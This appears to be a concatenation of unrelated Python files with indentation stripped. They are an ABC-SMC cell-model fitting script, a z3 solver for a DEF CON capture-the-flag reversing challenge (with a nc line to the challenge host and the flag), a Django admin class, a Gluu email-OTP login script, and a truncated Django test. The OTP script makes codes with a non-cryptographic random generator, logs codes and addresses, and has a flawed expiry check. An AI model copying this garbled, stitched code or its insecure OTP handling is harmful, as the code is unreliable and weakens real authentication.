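# (N0 + (G - 1) * N1) x (N0 + (G - 1) * N1) generator in which the block diagonals
# remove cells at rate l[g] + m[g], the sub-diagonal within a block moves cells to
# the next stage at rate l[g], and the 2 * l[g] entries linking consecutive
# generations double the cell count on division. `exp_matrix` stacks
# expm(A * t) @ inits for every time point and returns the transpose, so each row
# is a stage and each column a time point.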
# Define the functions to use in the ABC-SMC algorithm to generate the first epsilon, to run the first iteration
# and to run all the other iterations.
# As it may be difficult to decide on a reasonably large value of epsilon to use at the first iteration,
# we defined the function below to generate it.
def generate_eps1(nn, rr):
# Empty array to store the distance.
results = np.empty((0))
# Empty array to store the accepted parameters.
params = np.empty((0, n_pars))
for run in range(nn * rr):
# Sample the parameters from uniform prior distributions.
l0, lambd = 10 ** np.random.uniform(-3, 1, 2)
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
alpha = 10 ** np.random.uniform(-5, -1)
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = alpha * i
pars_int = np.array([np.random.randint(1, 50), np.random.randint(1, 50)])
C0 = 10 ** np.random.uniform(4, 6)
N0 = pars_int[0]
N1 = pars_int[1]
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
results = np.hstack((results, distance))
params = np.vstack((params, np.hstack((C0, l0, lambd, alpha, pars_int))))
# Compute epsilon to use at the first iteration.
epsilon = np.median(results)
return epsilon
# Define the function for the first iteration of ABC-SMC in which the parameters are sampled
# from the uniform prior distributions.
def iteration1(nn):
# Empty array to store the distance.
results = np.empty((0, 1))
# Empty array to store the accepted parameters.
params = np.empty((0, n_pars))
number = 0 # Counter for the sample size.
truns = 0 # Counter for the total number of runs.
while number < nn:
truns += 1
# Sample the parameters from uniform prior distributions.
l0, lambd = 10 ** np.random.uniform(-3, 1, 2)
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
alpha = 10 ** np.random.uniform(-5, -1)
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = alpha * i
pars_int = np.array([np.random.randint(1, 50), np.random.randint(1, 50)])
C0 = 10 ** np.random.uniform(4, 6)
N0 = pars_int[0]
N1 = pars_int[1]
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
pars = np.hstack((C0, l0, lambd, alpha, pars_int))
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
# If the distance is less than epsilon, store the parameters values and increase by one the counter for
# the sample size.
if distance < eps1:
number += 1
results = np.vstack((results, distance))
params = np.vstack((params, pars))
# Compute the weight for each accepted parameter set - at iteration 1, parameter sets have equal weight.
weights = np.empty((0, 1))
for i in range(nn):
weights = np.vstack((weights, 1 / nn))
# Return the results: distance, accepted parameters, weights and total number of runs.
return [np.hstack((results, params, weights)), truns]
# Function for the other iterations of the ABC-SMC algorithm, where the parameter values are sampled
# from the posterior distributions of the previous iteration.
def other_iterations(nn, it):
# Compute uniform areas to sample within in order to perturb the parameters.
ranges = []
for i in range(n_pars - 2):
r1 = np.max(np.log10(ABC_runs[it][:, i + 1])) - np.min(np.log10(ABC_runs[it][:, i + 1]))
ranges.append(r1)
for i in range(n_pars - 2, n_pars):
r1 = np.max(ABC_runs[it][:, i + 1]) - np.min(ABC_runs[it][:, i + 1])
ranges.append(r1)
ranges_arr = np.asarray(ranges)
sigma = 0.1 * ranges_arr
sigma[n_pars - 2] = int(np.ceil(sigma[n_pars - 2]))
sigma[n_pars - 1] = int(np.ceil(sigma[n_pars - 1]))
# Define epsilon as median of the accepted distance values from previous iteration.
epsilon = np.median(ABC_runs[it][:, 0])
# To use when sampling the new parameters.
p_list = [i for i in range(nn)]
# Define upper and lower bounds of the prior distributions for each parameter in the model.
lower_bounds = np.hstack((10 ** 4, 10 ** (-3), 10 ** (-3), 10 ** (-5), 1, 1))
upper_bounds = np.hstack((10 ** 6, 10, 10, 10 ** (-1), 50, 50))
# Empty array to store the distance.
results = np.empty((0))
# Empty array to store accepted parameters.
params = np.empty((0, n_pars))
# Empty array to store the prior samples.
priors_abc = np.empty((0, n_pars))
# Empty array to store the weights.
weights_arr = np.empty((0))
number = 0 # Counter for the sample size.
truns = 0 # Counter for the total number of runs.
while number < nn:
truns += 1
check = 0
# The following while loop is to sample the parameters from the posterior distributions of the previous
# iteration. Then the parameters are perturbed making use of a uniform perturbation kernel.
# If the new parameters lie within the initial prior ranges, they are used to obtain model predictions,
# otherwise they are sampled again.
while check < 1:
# Randomly choose a parameter set from the posterior obtained from the previous iteration.
choice = np.random.choice(p_list, 1, p=ABC_runs[it][:,n_pars + 1])
prior_sample = ABC_runs[it][:, range(1, n_pars + 1)][choice]
# Generate new parameters through perturbation.
parameters = []
for i in range(n_pars - 2):
lower = np.log10(prior_sample[0, i]) - sigma[i]
upper = np.log10(prior_sample[0, i]) + sigma[i]
pars = np.random.uniform(lower, upper)
parameters.append(10 ** pars)
for i in range(n_pars - 2, n_pars):
lower = prior_sample[0, i] - sigma[i]
upper = prior_sample[0, i] + sigma[i]
pars = np.random.randint(lower, upper)
parameters.append(pars)
# Check that the new parameters lie within the initial prior ranges.
check_out = 0
for ik in range(n_pars):
if parameters[ik] < lower_bounds[ik] or parameters[ik] > upper_bounds[ik]:
check_out = 1
if check_out == 0:
check += 1
C0 = float(parameters[0])
l0, lambd = parameters[1:3]
l = np.array([lambd for _ in range(dist_gen)])
l[0] = l0
m = np.zeros(dist_gen)
for i in range(dist_gen):
m[i] = i * parameters[3]
N0 = int(parameters[n_pars - 2])
N1 = int(parameters[n_pars - 1])
inits = np.zeros((N0 + (G - 1) * N1))
inits[0] = C0
# Run the model to compute the expected number of cells in each generation.
generations = [[] for _ in range(dist_gen)]
modelexp = exp_matrix(N0, N1, inits, t2, l, m)
s0 = sum(modelexp[0:N0])
generations[0].append(s0)
for i in range(1, dist_gen):
if i < 5:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + i * N1])
generations[i].append(s)
else:
s = sum(modelexp[N0 + (i - 1) * N1:N0 + (G - 1) * N1])
generations[i].append(s)
# Compute the distance between the model predictions and the experimental data.
generationsravel = np.ravel(generations)
dataravel = np.ravel(data)
std_ravel = np.ravel(std_dev)
distance = np.sqrt(np.sum(((generationsravel - dataravel) / std_ravel) ** 2))
# If the distance is less than epsilon, store the parameters values and increase by one the counter for
# the sample size.
if distance < epsilon:
number += 1
# Compute the weights for the accepted parameter set.
denom_arr = []
for j in range(nn):
weight = ABC_runs[it][j, n_pars + 1]
params_row = ABC_runs[it][j, 1:n_pars + 1]
boxs_up = []
boxs_low = []
for i in range(n_pars - 2):
boxs_up.append(np.log10(params_row[i]) + sigma[i])
boxs_low.append(np.log10(params_row[i]) - sigma[i])
for i in range(n_pars - 2, n_pars):
boxs_up.append(params_row[i] + sigma[i])
boxs_low.append(params_row[i] - sigma[i])
outside = 0
for i in range(n_pars - 2):
if np.log10(parameters[i]) < boxs_low[i] or np.log10(parameters[i]) > boxs_up[i]:
outside = 1
for i in range(n_pars - 2, n_pars):
if parameters[i] < boxs_low[i] or parameters[i] > boxs_up[i]:
outside = 1
if outside == 1:
denom_arr.append(0)
else:
denom_arr.append(weight * np.prod(1 / (2 * sigma)))
weight_param = 1 / np.sum(denom_arr)
weights_arr = np.hstack((weights_arr, weight_param))
results = np.hstack((results, distance))
params = np.vstack((params, parameters))
priors_abc = np.vstack((priors_abc, prior_sample))
# Normalise the weights.
weights_arr2 = weights_arr / np.sum(weights_arr)
weights_arr3 = np.reshape(weights_arr2, (nn, 1))
# Return the results: distance, accepted parameters, weights and total number of runs.
return [np.hstack((np.reshape(results, (nn, 1)), params, weights_arr3)), epsilon, truns]
# Sample size for the ABC-SMC.
sample_size = 10000
# Number of iterations to run.
num_iters = 16
# To generate the first value of epsilon.
eps1 = generate_eps1(sample_size,1)
Epsilons = [eps1]
# Run the first iteration of ABC-SMC.
first_output = iteration1(sample_size)
ABC_runs = [first_output[0]]
# Run all the other iterations of ABC-SMC.
for iterat in range(num_iters):
run = other_iterations(sample_size,iterat)
ABC_runs.append(run[0])
Epsilons.append(run[1])
# Save the results as a text file.
np.savetxt('Posterior_F5_multi_stage.txt', ABC_runs[num_iters])
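# Optional quick summary of the final posterior: column 0 holds the distance,
# columns 1..n_pars hold (C0, l0, lambda, alpha, N0, N1) in the order stacked
# above, and the last column holds the normalised weight.
final_posterior = ABC_runs[num_iters]
par_names = ["C0", "l0", "lambda", "alpha", "N0", "N1"]
for i, name in enumerate(par_names):
    print("posterior median of %s: %g" % (name, np.median(final_posterior[:, i + 1])))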
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import struct
import z3
def s264(s):
return struct.unpack('<Q', s)[0]
def to8(i):
return i & 0xff
def to16(i):
return i & 0xffff
def to32(i):
return i & 0xffffffff
################################################################################
def f_a(a1, a2):
return a1 ^ a2
def f_b(a1, a2, a3):
return (to8(z3.LShR(a1, 8 * a2)) << 8 * a3) | (
to8(z3.LShR(a1, 8 * a3)) << 8 * a2) | ~(255 << 8 * a2) & ~(255 << 8 * a3) & a1
def f_c(a1, a2):
return (a1 << (a2 & 0x3F)) | (z3.LShR(a1, (64 - (a2 & 0x3F))))
def f_d(a1, a2):
return (a1 << (64 - (a2 & 0x3F))) | z3.LShR(a1, (a2 & 0x3F))
def f_e(a1):
return (a1 << 56) ^ a1 & 0xFF00000000000000 | z3.LShR((to16(a1) & 0xFF00), 8) ^ to8(a1) | z3.LShR(
(a1 & 0xFF0000), 8) ^ to16(a1) & 0xFF00 | z3.LShR((to32(a1) & 0xFF000000), 8) ^ a1 & 0xFF0000 | z3.LShR(
(a1 & 0xFF00000000), 8) ^ to32(a1) & 0xFF000000 | z3.LShR(
(a1 & 0xFF0000000000), 8) ^ a1 & 0xFF00000000 | z3.LShR(
(a1 & 0xFF000000000000), 8) ^ a1 & 0xFF0000000000 | z3.LShR(
(a1 & 0xFF00000000000000), 8) ^ a1 & 0xFF000000000000
def f_f(a1):
return z3.LShR((a1 & 0xFF00000000000000), 8) | z3.LShR((a1 & 0xFF000000000000), 40) | z3.LShR(
(a1 & 0xFF0000000000), 40) | z3.LShR((a1 & 0xFF00000000), 16) | ((to32(a1) & 0xFF000000) << 16) | (
(a1 & 0xFF0000) << 40) | ((to16(a1) & 0xFF00) << 24) | (to16(a1) << 24)
def check1(i):
v1 = f_a(i, 3861390726976975706)
v2 = f_b(v1, 2, 0)
v3 = f_a(v2, 0x89FDAF6604952DF1)
v4 = f_a(v3, 0xE9F30F0CE704876A)
v5 = f_b(v4, 2, 3)
v6 = f_a(v5, 0xBDC5026D3C0B56E6)
v7 = f_c(v6, 16)
v8 = f_c(v7, 35)
v9 = f_d(v8, 19)
v10 = f_e(v9)
v11 = f_c(v10, 36)
v12 = f_d(v11, 40)
v13 = f_b(v12, 1, 0)
v14 = f_a(v13, 6765015749217278743)
v15 = f_f(v14)
v16 = f_f(v15)
v17 = f_b(v16, 2, 1)
v18 = f_a(v17, 7686949068708848117)
v19 = f_b(v18, 3, 0)
v20 = f_f(v19)
v21 = f_a(v20, 6401935715922169987)
v22 = f_d(v21, 22)
v23 = f_e(v22)
v24 = f_a(v23, 5166993816397978483)
v25 = f_e(v24)
v26 = f_e(v25)
v27 = f_b(v26, 6, 5)
v28 = f_c(v27, 59)
v29 = f_b(v28, 5, 2)
v30 = f_b(v29, 2, 3)
v31 = f_c(v30, 12)
v32 = f_a(v31, 0xAD25307F8E364B17)
v33 = f_a(v32, 5234710379464860866)
v34 = f_c(v33, 6)
v35 = f_b(v34, 6, 5)
v36 = f_d(v35, 11)
v37 = f_f(v36)
v38 = f_a(v37, 0x869365DB4C9F3CB6)
v39 = f_f(v38)
v40 = f_d(v39, 2)
v41 = f_a(v40, 4649309708712362587)
v42 = f_c(v41, 35)
v43 = f_c(v42, 9)
v44 = f_e(v43)
v45 = f_c(v44, 7)
v46 = f_c(v45, 38)
v47 = f_e(v46)
v48 = f_a(v47, 0xDEF2D72447EF4E1B)
v49 = f_f(v48)
v50 = f_f(v49)
v51 = f_b(v50, 2, 7)
v52 = f_d(v51, 51)
v53 = f_f(v52)
v54 = f_d(v53, 19)
v55 = f_a(v54, 0x95DE49591A44EE21)
v56 = f_e(v55)
v57 = f_f(v56)
return f_d(v57, 16)
def check2(i):
v1 = f_c(i, 22)
v2 = f_f(v1)
v3 = f_b(v2, 4, 1)
v4 = f_f(v3)
v5 = f_e(v4)
v6 = f_c(v5, 35)
v7 = f_b(v6, 2, 6)
v8 = f_a(v7, 0x80A9EA4F90944FEA)
v9 = f_c(v8, 3)
v10 = f_b(v9, 0, 1)
v11 = f_b(v10, 1, 2)
v12 = f_f(v11)
v13 = f_e(v12)
v14 = f_b(v13, 5, 1)
v15 = f_d(v14, 24)
v16 = f_c(v15, 39)
v17 = f_b(v16, 2, 4)
v18 = f_a(v17, 7462025471038891063)
v19 = f_b(v18, 4, 3)
v20 = f_b(v19, 0, 7)
v21 = f_c(v20, 62)
v22 = f_f(v21)
v23 = f_b(v22, 7, 6)
v24 = f_b(v23, 2, 6)
v25 = f_f(v24)
v26 = f_e(v25)
v27 = f_b(v26, 5, 2)
v28 = f_e(v27)
v29 = f_b(v28, 1, 7)
v30 = f_a(v29, 4749710960471120103)
v31 = f_f(v30)
v32 = f_e(v31)
v33 = f_b(v32, 1, 4)
v34 = f_c(v33, 10)
v35 = f_f(v34)
v36 = f_f(v35)
v37 = f_d(v36, 24)
v38 = f_b(v37, 0, 4)
v39 = f_d(v38, 61)
v40 = f_b(v39, 3, 4)
v41 = f_d(v40, 35)
v42 = f_c(v41, 55)
v43 = f_c(v42, 34)
v44 = f_e(v43)
v45 = f_e(v44)
v46 = f_d(v45, 23)
v47 = f_c(v46, 59)
v48 = f_d(v47, 20)
v49 = f_c(v48, 28)
v50 = f_a(v49, 0xC26499379C0927CD)
v51 = f_e(v50)
return f_d(v51, 13)
def check3(i):
v1 = f_c(i, 18)
v2 = f_c(v1, 29)
v3 = f_b(v2, 5, 3)
v4 = f_b(v3, 0, 7)
v5 = f_c(v4, 18)
v6 = f_a(v5, 0xC9AB604BB92038AD)
v7 = f_d(v6, 33)
v8 = f_b(v7, 0, 4)
v9 = f_e(v8)
v10 = f_b(v9, 6, 2)
v11 = f_d(v10, 13)
v12 = f_d(v11, 20)
v13 = f_a(v12, 6368261268581873766)
v14 = f_e(v13)
v15 = f_f(v14)
v16 = f_d(v15, 46)
v17 = f_b(v16, 2, 3)
v18 = f_d(v17, 44)
v19 = f_d(v18, 3)
v20 = f_b(v19, 4, 3)
v21 = f_e(v20)
v22 = f_b(v21, 7, 6)
v23 = f_d(v22, 59)
v24 = f_d(v23, 38)
v25 = f_f(v24)
v26 = f_b(v25, 1, 5)
v27 = f_f(v26)
v28 = f_c(v27, 27)
v29 = f_a(v28, 0xBED577A97EB7966F)
v30 = f_d(v29, 14)
v31 = f_c(v30, 7)
v32 = f_c(v31, 18)
v33 = f_c(v32, 57)
v34 = f_a(v33, 0xB44427BE7889C31B)
v35 = f_a(v34, 929788566303591270)
v36 = f_a(v35, 0x94B1608ADB7F7221)
v37 = f_a(v36, 0x85BEF139817EBC4A)
v38 = f_b(v37, 5, 1)
v39 = f_c(v38, 20)
v40 = f_c(v39, 24)
v41 = f_d(v40, 46)
v42 = f_d(v41, 13)
v43 = f_a(v42, 0xC95E5C35034B9775)
v44 = f_c(v43, 7)
v45 = f_a(v44, 641209893495219690)
v46 = f_a(v45, 6473287570272602621)
v47 = f_e(v46)
v48 = f_b(v47, 4, 7)
v49 = f_e(v48)
v50 = f_d(v49, 22)
v51 = f_d(v50, 50)
return f_e(v51)
def check4(i):
v1 = f_b(i, 1, 7)
v2 = f_c(v1, 6)
v3 = f_b(v2, 2, 5)
v4 = f_d(v3, 57)
v5 = f_a(v4, 902179681853661902)
v6 = f_b(v5, 5, 1)
v7 = f_c(v6, 1)
v8 = f_e(v7)
v9 = f_a(v8, 6764338754798371998)
v10 = f_e(v9)
v11 = f_c(v10, 6)
v12 = f_e(v11)
v13 = f_c(v12, 33)
v14 = f_d(v13, 25)
v15 = f_e(v14)
v16 = f_a(v15, 762415417889401952)
v17 = f_b(v16, 6, 2)
v18 = f_e(v17)
v19 = f_a(v18, -3724318961155856981)
v20 = f_a(v19, -8646321147571282756)
v21 = f_e(v20)
v22 = f_a(v21, -8802313616937474543)
v23 = f_d(v22, 8)
v24 = f_d(v23, 43)
v25 = f_a(v24, 7150187182015826299)
v26 = f_b(v25, 3, 1)
v27 = f_b(v26, 5, 7)
v28 = f_f(v27)
v29 = f_e(v28)
v30 = f_d(v29, 59)
v31 = f_d(v30, 10)
v32 = f_e(v31)
v33 = f_b(v32, 2, 1)
v34 = f_b(v33, 7, 2)
v35 = f_e(v34)
v36 = f_a(v35, 7246290916701591349)
v37 = f_a(v36, -243320396905423181)
v38 = f_a(v37, -43605043069428557)
v39 = f_b(v38, 2, 4)
v40 = f_b(v39, 5, 4)
v41 = f_d(v40, 11)
v42 = f_e(v41)
v43 = f_c(v42, 39)
v44 = f_f(v43)
v45 = f_e(v44)
v46 = f_a(v45, -4064264580452746468)
v47 = f_f(v46)
v48 = f_e(v47)
v49 = f_c(v48, 35)
v50 = f_b(v49, 3, 5)
v51 = f_e(v50)
v52 = f_f(v51)
return f_e(v52)
s = z3.Solver()
i1 = z3.BitVec('i1', 64)
i2 = z3.BitVec('i2', 64)
i3 = z3.BitVec('i3', 64)
i4 = z3.BitVec('i4', 64)
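# Constrain every byte of each 64-bit input to characters the service accepts:
# a space (0x20) or a byte in (0x40, 0x7a] excluding '[', '\', ']', '^' and '`',
# i.e. upper/lower-case letters and '_'.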
for v in [i1, i2, i3, i4]:
for i in range(8):
mask = 0xff << (i * 8)
s.add(z3.Or(v & mask == (32 << (i * 8)), v & mask > (0x40 << (i * 8))))
s.add(v & mask <= (0x7a << (i * 8)))
s.add(v & mask != (91 << (i * 8)))
s.add(v & mask != (92 << (i * 8)))
s.add(v & mask != (93 << (i * 8)))
s.add(v & mask != (94 << (i * 8)))
s.add(v & mask != (96 << (i * 8)))
r1 = check1(i1)
r2 = check2(i2)
r3 = check3(i3)
r4 = check4(i4)
s.add(r1 ^ r2 ^ r3 ^ r4 == 0xB101124831C0110A)
assert s.check() == z3.sat
model = s.model()
print repr(''.join(struct.pack('<Q', model[v].as_long()) for v in [i1, i2, i3, i4]))
# ' V YYVZj iyVFvxPDalGHWT aLw YT'
# $ nc amadhj_b76a229964d83e06b7978d0237d4d2b0.quals.shallweplayaga.me 4567
# V YYVZj iyVFvxPDalGHWT aLw YT
# The flag is: Da robats took err jerbs.
|
from django.contrib import admin
# Register your models here.
from apps.models import App
import hashlib
@admin.register(App)
class ApisAppAdmin(admin.ModelAdmin):
fields = ['name', 'application', 'category', 'url', 'publish_date', 'desc']
# exclude = ['appid']
def save_model(self, request, obj, form, change):
src = obj.category + obj.application
appid = hashlib.md5(src.encode('utf8')).hexdigest()
obj.appid = appid
super().save_model(request, obj, form, change)
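# For reference, the appid assigned in save_model is just the hex MD5 digest of
# the category concatenated with the application name (example values made up):
#
#   >>> import hashlib
#   >>> hashlib.md5(("games" + "chess-helper").encode("utf8")).hexdigest()
#   # -> a 32-character hexadecimal string stored on obj.appid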
|
from org.gluu.oxauth.service import AuthenticationService
from org.gluu.oxauth.service import UserService
from org.gluu.oxauth.auth import Authenticator
from org.gluu.oxauth.security import Identity
from org.gluu.model.custom.script.type.auth import PersonAuthenticationType
from org.gluu.service.cdi.util import CdiUtil
from org.gluu.util import StringHelper
from org.gluu.oxauth.util import ServerUtil
from org.gluu.oxauth.service.common import ConfigurationService
from org.gluu.oxauth.service.common import EncryptionService
from org.gluu.jsf2.message import FacesMessages
from javax.faces.application import FacesMessage
from org.gluu.persist.exception import AuthenticationException
from datetime import datetime, timedelta
from java.util import GregorianCalendar, TimeZone
from java.io import File
from java.io import FileInputStream
from java.util import Enumeration, Properties
#dealing with smtp server
from java.security import Security
from javax.mail.internet import MimeMessage, InternetAddress
from javax.mail import Session, Message, Transport
from java.util import Arrays
import random
import string
import re
import urllib
import java
try:
import json
except ImportError:
import simplejson as json
class EmailValidator():
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
def check(self, email):
if(re.search(self.regex,email)):
print "EmailOTP. - %s is a valid email format" % email
return True
else:
print "EmailOTP. - %s is an invalid email format" % email
return False
class Token:
#class that deals with string token
def generateToken(self,lent):
rand1="1234567890123456789123456789"
rand2="9876543210123456789123456789"
first = int(rand1[:int(lent)])
first1 = int(rand2[:int(lent)])
token = random.randint(first, first1)
return token
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
def init(self, customScript, configurationAttributes):
print "EmailOTP. - Initialized successfully"
return True
def destroy(self, configurationAttributes):
print "EmailOTP. - Destroyed successfully"
return True
def getApiVersion(self):
return 11
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAuthenticationMethodClaims(self, configurationAttributes):
return None
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
print "Email 2FA - Authenticate for step %s" % ( step)
authenticationService = CdiUtil.bean(AuthenticationService)
identity = CdiUtil.bean(Identity)
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
subject = "Gluu Authentication Token"
session_attributes = identity.getSessionId().getSessionAttributes()
multipleEmails = session_attributes.get("emailIds")
if step == 1:
try:
# Check if user authenticated already in another custom script
user2 = authenticationService.getAuthenticatedUser()
if user2 == None:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if (StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password)):
userService = CdiUtil.bean(UserService)
logged_in = authenticationService.authenticate(user_name, user_password)
if (not logged_in):
return False
user2 = authenticationService.getAuthenticatedUser()
if user2 is not None:
uid = user2.getAttribute("uid")
lent = configurationAttributes.get("token_length").getValue2()
new_token = Token()
token = new_token.generateToken(lent)
body = "Here is your token: %s" % token
sender = EmailSender()
emailIds = user2.getAttribute("oxEmailAlternate")
print "emailIds : %s" % emailIds
data = json.loads(emailIds)
#Attempt to send message now if user has only one email id
if len(data['email-ids']) == 1:
email = data['email-ids'][0]
print "EmailOTP. email to - %s" % email['email']
sender.sendEmail( email['email'], subject, body)
else:
commaSeperatedEmailString = []
for email in data['email-ids']:
reciever_id = email['email']
print "EmailOTP. Email to - %s" % reciever_id
sender.sendEmail( reciever_id, subject, body)
commaSeperatedEmailString.append(self.getMaskedEmail(reciever_id))
identity.setWorkingParameter("emailIds", ",".join(commaSeperatedEmailString))
otptime1 = datetime.now()
tess = str(otptime1)
listee = tess.split(':')
identity.setWorkingParameter("sentmin", listee[1])
identity.setWorkingParameter("token", token)
return True
else:
print "EmailOTP. oxEmailAlternate not present"
return False
except AuthenticationException as err:
print err
return False
else:
#Means the selection email page was used
if step == 2 and multipleEmails != None :
token = identity.getWorkingParameter("token")
print requestParameters
idx = ServerUtil.getFirstValue(requestParameters, "OtpEmailLoginForm:indexOfEmail")
if idx != None and token != None:
sendToEmail = multipleEmails.split(",")[int(idx)]
print "EmailOtp. Sending email to : %s " % sendToEmail
body = "Here is your token: %s" % token
sender = EmailSender()
sender.sendEmail( sendToEmail, subject, body)
return True
else:
print "EmailOTP. Something wrong with index or token"
return False
input_token = ServerUtil.getFirstValue(requestParameters, "OtpEmailLoginForm:passcode")
print "EmailOTP. - Token inputed by user is %s" % input_token
token = str(identity.getWorkingParameter("token"))
min11 = int(identity.getWorkingParameter("sentmin"))
nww = datetime.now()
te = str(nww)
listew = te.split(':')
curtime = int(listew[1])
token_lifetime = int(configurationAttributes.get("token_lifetime").getValue2())
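# Expiry check below: minutes are compared modulo the hour. If the OTP was sent
# in the last ten minutes of an hour and is being checked after the hour rolled
# over, the elapsed time is taken as (60 - sent_minute) + current_minute;
# otherwise the plain difference current_minute - sent_minute is used. Anything
# above token_lifetime is rejected as expired.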
if ((min11<= 60) and (min11>= 50)):
if ((curtime>=50) and (curtime<=60)):
timediff1 = curtime - min11
if timediff1>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
elif ((curtime>=0) or (curtime<=10)):
timediff1 = 60 - min11
timediff1 = timediff1 + curtime
if timediff1>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
if ((min11>=0) and (min11<=60) and (curtime>=0) and (curtime<=60)):
timediff2 = curtime - min11
if timediff2>token_lifetime:
#print "OTP Expired"
facesMessages.add(FacesMessage.SEVERITY_ERROR, "OTP Expired")
return False
# compares token sent and token entered by user
if input_token == token:
print "Email 2FA - token entered correctly"
identity.setWorkingParameter("token_valid", True)
return True
else:
facesMessages = CdiUtil.bean(FacesMessages)
facesMessages.setKeepMessages()
facesMessages.clear()
facesMessages.add(FacesMessage.SEVERITY_ERROR, "Wrong code entered")
print "EmailOTP. Wrong code entered"
return False
def prepareForStep(self, configurationAttributes, requestParameters, step):
print "EmailOTP. - Preparing for step %s" % step
return True
def getExtraParametersForStep(self, configurationAttributes, step):
return Arrays.asList("token","emailIds","token_valid","sentmin")
def getCountAuthenticationSteps(self, configurationAttributes):
print "EmailOTP. getCountAuthenticationSteps called"
if CdiUtil.bean(Identity).getWorkingParameter("emailIds") == None:
return 2
else:
return 3
def getPageForStep(self, configurationAttributes, step):
print "EmailOTP. getPageForStep called %s" % step
defPage = "/casa/otp_email.xhtml"
if step == 2:
if CdiUtil.bean(Identity).getWorkingParameter("emailIds") == None:
return defPage
else:
return "/casa/otp_email_prompt.xhtml"
elif step == 3:
return defPage
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def logout(self, configurationAttributes, requestParameters):
return True
def hasEnrollments(self, configurationAttributes, user):
values = user.getAttributeValues("oxEmailAlternate")
if values != None:
return True
else:
return False
def getMaskedEmail (self, emailid):
regex = r"(?<=.)[^@\n](?=[^@\n]*?@)|(?:(?<=@.)|(?!^)\G(?=[^@\n]*$)).(?=.*\.)"
subst = "*"
result = re.sub(regex, subst, emailid, 0, re.MULTILINE)
if result:
print (result)
return result
class EmailSender():
#class that sends e-mail through smtp
def getSmtpConfig(self):
smtp_config = None
smtpconfig = CdiUtil.bean(ConfigurationService).getConfiguration().getSmtpConfiguration()
if smtpconfig is None:
print "Sign Email - SMTP CONFIG DOESN'T EXIST - Please configure"
else:
encryptionService = CdiUtil.bean(EncryptionService)
smtp_config = {
'host' : smtpconfig.getHost(),
'port' : smtpconfig.getPort(),
'user' : smtpconfig.getUserName(),
'from' : smtpconfig.getFromEmailAddress(),
'pwd_decrypted' : encryptionService.decrypt(smtpconfig.getPassword()),
'req_ssl' : smtpconfig.isRequiresSsl(),
'requires_authentication' : smtpconfig.isRequiresAuthentication(),
'server_trust' : smtpconfig.isServerTrust()
}
return smtp_config
def sendEmail(self, useremail, subject, messageText):
# server connection
smtpconfig = self.getSmtpConfig()
properties = Properties()
properties.setProperty("mail.smtp.host", smtpconfig['host'])
properties.setProperty("mail.smtp.port", str(smtpconfig['port']))
properties.setProperty("mail.smtp.starttls.enable", "true")
session = Session.getDefaultInstance(properties)
message = MimeMessage(session)
message.setFrom(InternetAddress(smtpconfig['from']))
message.addRecipient(Message.RecipientType.TO,InternetAddress(useremail))
message.setSubject(subject)
#message.setText(messageText)
message.setContent(messageText, "text/html")
transport = session.getTransport("smtp")
transport.connect(properties.get("mail.smtp.host"),int(properties.get("mail.smtp.port")), smtpconfig['user'], smtpconfig['pwd_decrypted'])
transport.sendMessage(message,message.getRecipients(Message.RecipientType.TO))
transport.close()
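# Minimal standalone sketch of the helper classes above. It never runs when Gluu
# loads this script (the module is not __main__ there) and exists only to show
# the expected behaviour; the values are illustrative.
if __name__ == "__main__":
    EmailValidator().check("user@example.org")   # prints that the format is valid
    sample_token = Token().generateToken("6")    # a 6-digit numeric OTP
    print "sample token: %s" % sample_token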
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Country, State
from api.serializers import StateSerializer
def states_url(country):
"""Return states By country URL"""
return reverse('api:state-list', args=[country])
def sample_country():
country = Country.objects.create(
name='Bangladesh',
latitude=23.6850,
longitude=90.3563,
code='BD'
)
return country
class PublicStatesApiTests(TestCase):
"""Test the publicly available states API"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
